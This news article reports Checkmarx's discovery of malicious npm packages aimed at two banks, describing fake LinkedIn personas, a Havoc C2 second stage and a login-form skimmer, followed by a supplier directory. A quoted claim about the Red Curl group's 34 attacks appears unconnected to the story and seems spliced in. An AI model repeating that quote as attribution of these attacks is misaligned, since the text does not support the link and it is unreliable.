Banks Hacked With Open-Source Software

Cyber security researchers at Checkmarx in the first half of 2023 discovered that an open-source software supply chain campaign is targeting the banking industry.

Two banks have been targeted by open-source software supply chain attacks in recent months in what researchers are calling the first such incidents of their kind.

“These attacks showcased advanced techniques, including targeting specific components in web assets of the victim bank by attaching malicious functionalities to it,” says Checkmarx.

"Over the past four and a half years, the Russian-speaking group Red Curl has carried out at least 34 attacks on companies from the UK, Germany, Canada, Norway, Ukraine, and Australia".

The Hackers have created fake social media accounts to establish apparent validity alongside malicious software uploads.

In the first attack, the hackers uploaded malicious npm packages to the registry and posed as a bank employee.

The attackers created fake LinkedIn profiles to get in touch with the victims’ employees and used for each target a specific C2. The experts noticed that the contributor behind the malicious packages was linked to a LinkedIn profile page of an individual that was posing as an employee of the victim.

If the npm package was launched, the script determined the operating system type and downloaded a second-stage malware package via Azure’s CDN subdomains. The second-stage payload included the open-source command-and-control (C2) framework Havoc.

More attacks from the hacker have employed a similar strategy, where a malicious npm package would lay dormant until activated.

The other attack that Checkmarx reported on recently happened in February. Here too, the threat actor, completely separate from the attacker in May, uploaded their own package containing a malicious payload to npm.

In this instance, the payload was engineered specifically for the targeted bank. It was designed to hook onto a specific login form element on the bank's website and to capture and transmit information that users entered into the form when logging into the site.

Oodaloop:     The Hacker News:     Checkmarx:     Dark Reading:     The Record:     SOC Radar:     Security Affairs

 

___________________________________________________________________________________________

If you like this website and use the comprehensive 6,500-plus service supplier Directory, you can get unrestricted access, including the exclusive in-depth Directors Report series, by signing up for a Premium Subscription.

  • Individual £5 per month or £50 per year. Sign Up
  • Multi-User, Corporate & Library Accounts Available on Request

Cyber Security Intelligence: Captured Organised & Accessible

« US Ambassador To China Hacked
Australian Government Leaks Personal Data »

CyberSecurity Jobsite
Perimeter 81

Directory of Suppliers

IT Governance

IT Governance

IT Governance is a leading global provider of information security solutions. Download our free guide and find out how ISO 27001 can help protect your organisation's information.

XYPRO Technology

XYPRO Technology

XYPRO is the market leader in HPE Non-Stop Security, Risk Management and Compliance.

Resecurity

Resecurity

Resecurity is a cybersecurity company that delivers a unified platform for endpoint protection, risk management, and cyber threat intelligence.

CYRIN

CYRIN

CYRIN® Cyber Range. Real Tools, Real Attacks, Real Scenarios. See why leading educational institutions and companies in the U.S. have begun to adopt the CYRIN® system.

Syxsense

Syxsense

Syxsense brings together endpoint management and security for greater efficiency and collaboration between IT management and security teams.

Secnology

Secnology

Secnology is dedicated to developing and providing the most powerful and user friendly event analysis and security management solution.

Secure Decisions

Secure Decisions

Secure Decisions focus on research and product development related to national security including information assurance, computer network defense, cyber security education, and application security.

FoxGuard

FoxGuard

FoxGuard develops customized cyber security, compliance and industrial computing solutions for critical infrastructure entities and control system vendors.

Buglab

Buglab

The Buglab contest and Vigilante Protocol help companies all over the world to discover and fix vulnerabilities on their digital solutions or assets.

CryptoCurrency Certification Consortium (C4)

CryptoCurrency Certification Consortium (C4)

The CryptoCurrency Certification Consortium is a non-profit organization that provides certifications to professionals who perform cryptocurrency-related services.

Blue Hexagon

Blue Hexagon

Blue Hexagon is a deep learning innovator focused on protecting organizations from cyberthreats.

CloudSEK

CloudSEK

CloudSEK has set its sights on building the world’s fastest and most reliable AI technology, that identifies and resolves digital threats.

689cloud

689cloud

689Cloud is a cloud content collaboration platform that allows users to protect, track, and control files AFTER they have been shared.

Fairdinkum Consulting

Fairdinkum Consulting

Fairdinkum is a leading full-service IT consulting firm with more than two decades of experience in the industry.

DESCERT

DESCERT

DESCERT offers you an extended IT, cyber security, risk advisory & compliance audit team which provides strategic guidance, engineering and audit services.

CloudCoCo

CloudCoCo

CloudCoCo help UK businesses of all sizes and industries succeed by providing enterprise-grade technology at small-business prices.

DART Consulting & Training

DART Consulting & Training

DART is a leading cyber training and consultancy company. We enhance our clients’ cyber capabilities by growing and strengthening their frontline defense – the cyber teams.

CloudGuard

CloudGuard

CloudGuard is an AI-driven XDR platform that helps organisations to proactively detect and automatically remediate threats in real-time.

Universal Technical Resource Services (UTRS)

Universal Technical Resource Services (UTRS)

UTRS is a technology firm that delivers a wide range of engineering, technical, strategic, and digital services to the public and private sectors.

Sectricity

Sectricity

As independent ethical hackers, Sectricity go beyond traditional security, uncovering every vulnerability - testing both systems and employees to eliminate weak spots.

Hicomply

Hicomply

Hicomply simplifies compliance management with smart, user-friendly tools, helping you scale your processes and stay in control - no matter how complex.